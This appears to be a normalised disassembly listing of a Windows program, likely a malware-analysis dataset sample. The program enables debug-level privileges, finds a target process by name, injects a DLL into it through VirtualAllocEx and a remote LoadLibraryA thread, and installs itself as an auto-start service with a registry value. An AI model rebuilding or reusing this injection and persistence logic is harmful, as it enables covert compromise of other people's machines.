sub_401000
push ebx
push ebp
push esi
push edi
xor edi edi
call sub_401070
mov ebp [ esp + 0x14 ]
mov ebx [ Sleep@IAT ]
push ebp
push edi
call sub_401220
mov esi edi
push rw-data
call sub_4010f0
mov edi eax
add esp 0x4
test edi edi
jne r-xdata
push rw-data
call sub_4010f0
mov esi eax
add esp 0x4
cmp esi edi
je r-xdata
test esi esi
jne r-xdata
push 0xea60
call ebx
jmp r-xdata
push 0xea60
call ebx
jmp r-xdata
test esi esi
jne r-xdata
mov edi esi
jmp r-xdata
cmp esi edi
je r-xdata
test edi edi
jne r-xdata
sub_401070
sub esp 0x1c
lea eax [ esp ]
push eax
push 0x28
call [ GetCurrentProcess@IAT ]
push eax
call [ OpenProcessToken@IAT ]
test eax eax
je r-xdata
add esp 0x1c
retn
lea ecx [ esp + 0x4 ]
push ecx
push rw-data
push 0x0
call [ LookupPrivilegeValueA@IAT ]
test eax eax
je r-xdata
mov edx [ esp + 0x4 ]
mov eax [ esp + 0x8 ]
push 0x0
push 0x0
lea ecx [ esp + 0x14 ]
mov [ esp + 0x18 ] edx
mov edx [ esp + 0x8 ]
push 0x10
push ecx
push 0x0
push edx
mov [ esp + 0x24 ] 0x1
mov [ esp + 0x2c ] eax
mov [ esp + 0x30 ] 0x2
call [ AdjustTokenPrivileges@IAT ]
test eax eax
je r-xdata
mov eax [ esp ]
push eax
call [ CloseHandle@IAT ]
sub_4010f0
mov eax 0x110c
call sub_401970
mov eax [ rw-data ]
mov ecx [ rw-data ]
mov edx [ rw-data ]
push ebx
mov [ esp + 0xc ] eax
mov ax [ rw-data ]
mov [ esp + 0x10 ] ecx
mov cl [ rw-data ]
push ebp
push esi
push edi
mov [ esp + 0x24 ] ax
mov [ esp + 0x26 ] cl
mov ecx 0x3d
xor eax eax
lea edi [ esp + 0x27 ]
mov [ esp + 0x20 ] edx
lea edx [ esp + 0x14 ]
[ edi ]
stosb [ edi ]
push edx
lea eax [ esp + 0x120 ]
push 0x1000
push eax
call EnumProcesses
test eax eax
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x110c
retn
mov ebp [ esp + 0x14 ]
xor ebx ebx
shr ebp 0x2
test ebp ebp
jle r-xdata
mov esi [ esp + 0x10 ]
push esi
call [ CloseHandle@IAT ]
lea edi [ esp + 0x11c ]
inc ebx
add edi 0x4
cmp ebx ebp
jl r-xdata
lea edx [ esp + 0x14 ]
lea eax [ esp + 0x10 ]
push edx
push 0x4
push eax
push esi
call EnumProcessModules
test eax eax
je r-xdata
mov ecx [ edi ]
push ecx
push 0x0
push 0x410
call [ OpenProcess@IAT ]
mov esi eax
test esi esi
je r-xdata
push esi
call [ CloseHandle@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x110c
retn
mov edx [ esp + 0x10 ]
lea ecx [ esp + 0x18 ]
push 0x104
push ecx
push edx
push esi
call GetModuleBaseNameA
mov eax [ esp + 0x1120 ]
lea ecx [ esp + 0x18 ]
push eax
push ecx
call [ _stricmp@IAT ]
add esp 0x8
test eax eax
je r-xdata
push esi
call [ CloseHandle@IAT ]
mov eax [ esp + ebx * 4 + 0x11c ]
pop edi
pop esi
pop ebp
pop ebx
add esp 0x110c
retn
sub_401220
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x24
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor edi edi
mov [ ebp - 0x24 ] edi
xor ebx ebx
mov [ ebp - 0x20 ] ebx
mov [ ebp - 0x1c ] edi
mov [ ebp - 0x28 ] edi
mov [ ebp - 0x4 ] edi
push edi
mov esi [ ebp + 0xc ]
push esi
call [ _lopen@IAT ]
cmp eax 0xffffffff
je r-xdata
mov [ ebp - 0x4 ] 0xffffffff
call sub_40135b
mov ebx [ ebp - 0x20 ]
mov edi [ ebp - 0x28 ]
test edi edi
je r-xdata
mov eax [ ebp + 0x8 ]
push eax
push ebx
push 0x1f0fff
call [ OpenProcess@IAT ]
mov ebx eax
mov [ ebp - 0x20 ] ebx
test ebx ebx
je r-xdata
mov eax [ ebp - 0x1c ]
test eax eax
je r-xdata
push 0x8000
push 0x0
push edi
push ebx
call [ VirtualFreeEx@IAT ]
mov edi esi
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
mov esi ecx
inc esi
mov [ ebp - 0x34 ] esi
push 0x4
push 0x1000
push esi
push eax
push ebx
call [ VirtualAllocEx@IAT ]
mov edi eax
mov [ ebp - 0x28 ] edi
test edi edi
je r-xdata
test ebx ebx
je r-xdata
push eax
call [ CloseHandle@IAT ]
push rw-data
call [ LoadLibraryA@IAT ]
mov [ ebp - 0x30 ] eax
push rw-data
push eax
call [ GetProcAddress@IAT ]
mov [ rw-data ] eax
push 0x0
push esi
mov ecx [ ebp + 0xc ]
push ecx
push edi
push ebx
call eax
test eax eax
je r-xdata
mov esp [ ebp - 0x18 ]
mov eax [ ebp - 0x24 ]
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn 0x8
push ebx
call [ CloseHandle@IAT ]
push rw-data
push rw-data
call [ GetModuleHandleA@IAT ]
push eax
call [ GetProcAddress@IAT ]
mov esi eax
mov [ ebp - 0x2c ] esi
test esi esi
je r-xdata
push rw-data
mov edx [ ebp - 0x30 ]
push edx
call [ GetProcAddress@IAT ]
mov [ rw-data ] eax
push 0x0
push 0x0
push edi
push esi
push 0x0
push 0x0
push ebx
call eax
mov [ ebp - 0x1c ] eax
test eax eax
je r-xdata
push 0xffffffff
push eax
call [ WaitForSingleObject@IAT ]
mov [ ebp - 0x24 ] 0x1
mov ecx [ ebp - 0x30 ]
push ecx
call [ FreeLibrary@IAT ]
sub_40135b
test edi edi
je r-xdata
mov eax [ ebp - 0x1c ]
test eax eax
je r-xdata
push 0x8000
push 0x0
push edi
push ebx
call [ VirtualFreeEx@IAT ]
test ebx ebx
je r-xdata
push eax
call [ CloseHandle@IAT ]
mov esp [ ebp - 0x18 ]
mov eax [ ebp - 0x24 ]
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn 0x8
push ebx
call [ CloseHandle@IAT ]
sub_4013a0
sub esp 0x104
xor eax eax
push ebx
push ebp
mov ebp ecx
push esi
mov ecx 0x1
push edi
mov [ ebp ] r--data
mov [ rw-data ] ebp
mov [ ebp + 0x1a4 ] ecx
mov [ ebp + 0x1a8 ] ecx
lea ecx [ esp + 0x10 ]
push 0x104
push ecx
push eax
mov [ ebp + 0x19c ] eax
mov [ ebp + 0x1a0 ] 0x10
mov [ ebp + 0x1ac ] eax
mov [ ebp + 0x1b0 ] eax
mov [ ebp + 0x1b4 ] eax
mov [ ebp + 0x1b8 ] eax
mov [ ebp + 0x1bc ] eax
call [ GetModuleFileNameA@IAT ]
lea edx [ esp + 0x10 ]
push 0x5c
push edx
lea ebx [ ebp + 0x18 ]
call [ strrchr@IAT ]
mov edi eax
or ecx 0xffffffff
inc edi
xor eax eax
[ edi ]
not ecx
sub edi ecx
push 0x2e
mov eax ecx
mov esi edi
mov edi ebx
push ebx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
call [ strrchr@IAT ]
mov [ eax ] 0x0
mov edi ebx
or ecx 0xffffffff
xor eax eax
add esp 0x10
lea edx [ ebp + 0x58 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
xor eax eax
[ edi ] [ esi ]
mov ecx 0x41
lea edi [ ebp + 0x98 ]
[ edi ]
pop edi
mov eax ebp
pop esi
pop ebp
pop ebx
add esp 0x104
retn
sub_401490
push ebx
push esi
push edi
xor ebx ebx
push 0xf003f
push ebx
mov edi ecx
push ebx
call [ OpenSCManagerA@IAT ]
mov esi eax
test esi esi
je r-xdata
pop edi
mov eax ebx
pop esi
pop ebx
retn
add edi 0x18
push 0x1
push edi
push esi
call [ OpenServiceA@IAT ]
mov edi [ CloseServiceHandle@IAT ]
test eax eax
je r-xdata
push esi
call edi
push eax
mov ebx 0x1
call edi
sub_4014e0
sub esp 0x210
push ebx
push ebp
push esi
push 0xf003f
push 0x0
mov ebp ecx
push 0x0
call [ OpenSCManagerA@IAT ]
mov esi eax
test esi esi
mov [ esp + 0xc ] esi
jne r-xdata
lea eax [ esp + 0x118 ]
push 0x104
push eax
push 0x0
call [ GetModuleFileNameA@IAT ]
push 0x0
push 0x0
push 0x0
push 0x0
lea ecx [ esp + 0x128 ]
push 0x0
push ecx
push 0x1
push 0x2
push 0x20
lea edx [ ebp + 0x58 ]
lea eax [ ebp + 0x18 ]
push 0xf01ff
push edx
push eax
push esi
call [ CreateServiceA@IAT ]
mov ebx eax
test ebx ebx
jne r-xdata
pop esi
pop ebp
pop ebx
add esp 0x210
retn
push edi
mov ecx 0x8
mov esi rw-data
lea edi [ esp + 0x18 ]
[ edi ] [ esi ]
movsw [ edi ] [ esi ]
movsb [ edi ] [ esi ]
mov ecx 0x38
xor eax eax
lea edi [ esp + 0x3b ]
lea edx [ esp + 0x18 ]
[ edi ]
stosb [ edi ]
lea edi [ ebp + 0x18 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ esp + 0x14 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
push 0x20006
lea ecx [ esp + 0x20 ]
push 0x0
push ecx
push 0x80000002
call [ RegOpenKeyExA@IAT ]
add ebp 0x98
or ecx 0xffffffff
mov edi ebp
xor eax eax
[ edi ]
mov edx [ esp + 0x14 ]
not ecx
push ecx
push ebp
push 0x1
push eax
push rw-data
push edx
call [ RegSetValueExA@IAT ]
mov eax [ esp + 0x14 ]
push eax
call [ RegCloseKey@IAT ]
push 0x0
push 0x0
push ebx
call [ StartServiceA@IAT ]
mov esi [ CloseServiceHandle@IAT ]
pop edi
test eax eax
push ebx
jne r-xdata
push esi
call [ CloseServiceHandle@IAT ]
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x210
retn
call esi
mov edx [ esp + 0xc ]
push edx
call esi
pop esi
pop ebp
mov eax 0x1
pop ebx
add esp 0x210
retn
call esi
mov ecx [ esp + 0xc ]
push ecx
call esi
pop esi
pop ebp
mov eax 0x1
pop ebx
add esp 0x210
retn
sub_401680
push esi
mov esi [ rw-data ]
push sub_4017f0
lea eax [ esi + 0x18 ]
mov [ esi + 0x1a4 ] 0x2
push eax
call [ RegisterServiceCtrlHandlerA@IAT ]
test eax eax
mov [ esi + 0x19c ] eax
je r-xdata
pop esi
retn 0x8
mov ecx esi
call sub_401720
test eax eax
je r-xdata
push 0x1
mov ecx esi
call sub_4016f0
mov edx [ esi ]
mov ecx esi
mov [ esi + 0x1bc ] 0x1
mov [ esi + 0x1ac ] 0x0
mov [ esi + 0x1b4 ] 0x0
mov [ esi + 0x1b8 ] 0x0
call [ edx ]
sub_401720
push esi
push edi
mov esi ecx
push 0x2
call sub_4016f0
mov eax [ esi ]
mov ecx esi
call [ eax + 0x4 ]
mov edi eax
call [ GetLastError@IAT ]
mov [ esi + 0x1ac ] eax
xor eax eax
cmp edi eax
mov [ esi + 0x1b4 ] eax
mov [ esi + 0x1b8 ] eax
jne r-xdata
push 0x4
mov ecx esi
call sub_4016f0
pop edi
mov eax 0x1
pop esi
retn
push 0x1
mov ecx esi
call sub_4016f0
pop edi
xor eax eax
pop esi
retn
sub_401780
sub esp 0x104
lea eax [ esp ]
push ebx
push esi
push edi
push 0x104
push eax
push 0x0
call [ GetModuleFileNameA@IAT ]
lea ecx [ esp + 0xc ]
push 0x2e
push ecx
call [ strrchr@IAT ]
mov [ eax ] 0x0
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x14 ]
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ esp + 0x14 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call sub_401000
sub_4017f0
mov ecx [ esp + 0x4 ]
push esi
mov esi [ rw-data ]
lea eax [ ecx - 0x1 ]
cmp eax 0x4
ja r-xdata
cmp ecx 0x80
jb r-xdata
jmp [ eax * 4 + jump_table_401868 ]
mov ecx [ esi + 0x19c ]
lea eax [ esi + 0x1a0 ]
push eax
push ecx
call [ SetServiceStatus@IAT ]
pop esi
retn 0x4
mov edx [ esi ]
push ecx
mov ecx esi
call [ edx + 0x1c ]
push 0x3
mov ecx esi
call sub_4016f0
mov eax [ esi ]
mov ecx esi
call [ eax + 0x8 ]
jmp r-xdata
mov edx [ esi ]
mov ecx esi
call [ edx + 0x10 ]
jmp r-xdata
mov eax [ esi ]
mov ecx esi
call [ eax + 0x14 ]
jmp r-xdata
mov edx [ esi ]
mov ecx esi
call [ edx + 0xc ]
jmp r-xdata
mov eax [ esi ]
mov ecx esi
call [ eax + 0x18 ]
jmp r-xdata
sub_401890
sub esp 0x1c
push esi
push edi
push 0xf003f
push 0x0
mov edi ecx
push 0x0
call [ OpenSCManagerA@IAT ]
mov esi eax
test esi esi
je r-xdata
pop edi
pop esi
add esp 0x1c
retn
add edi 0x18
push 0xf01ff
push edi
push esi
call [ OpenServiceA@IAT ]
mov edi eax
test edi edi
je r-xdata
lea eax [ esp + 0x8 ]
push eax
push 0x1
push edi
call [ ControlService@IAT ]
test eax eax
je r-xdata
push edi
mov edi [ CloseServiceHandle@IAT ]
call edi
push esi
call edi
sub_401910
sub esp 0x1c0
lea ecx [ esp ]
call sub_4013a0
lea ecx [ esp ]
call sub_401490
test eax eax
jne r-xdata
lea ecx [ esp ]
call sub_401650
xor eax eax
add esp 0x1c0
retn 0x10
lea ecx [ esp ]
call sub_4014e0
sub_401970
push ecx
cmp eax 0x1000
lea ecx [ esp + 0x8 ]
jb r-xdata
sub ecx eax
mov eax esp
test [ ecx ] eax
mov esp ecx
mov ecx [ eax ]
mov eax [ eax + 0x4 ]
push eax
retn
sub ecx 0x1000
sub eax 0x1000
test [ ecx ] eax
cmp eax 0x1000
jae r-xdata
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_401b25
cmp [ rw-data ] ebx
jne r-xdata
call sub_401b10
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
mov eax [ _acmdln@IAT ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_401b22
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ GetStartupInfoA@IAT ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ GetModuleHandleA@IAT ]
push eax
call sub_401910
mov [ ebp - 0x68 ] eax
push eax
call [ exit@IAT ]
sub_401650
sub esp 0x10
xor eax eax
add ecx 0x18
mov [ esp + 0x8 ] eax
mov [ esp + 0xc ] eax
lea eax [ esp ]
mov [ esp ] ecx
push eax
mov [ esp + 0x8 ] sub_401680
call [ StartServiceCtrlDispatcherA@IAT ]
add esp 0x10
retn
sub_4017e3
add esp 0xc
pop edi
pop esi
pop ebx
add esp 0x104
retn
sub_401880
mov eax 0x1
retn
sub_4018f0
retn
sub_401900
xor eax eax
retn 0x4
GetModuleBaseNameA
jmp [ GetModuleBaseNameA@IAT ]
EnumProcessModules
jmp [ EnumProcessModules@IAT ]
EnumProcesses
jmp [ EnumProcesses@IAT ]
_except_handler3
jmp [ _except_handler3@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_401b10
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_401b22
xor eax eax
retn
sub_401b25
retn
_controlfp
jmp [ _controlfp@IAT ]
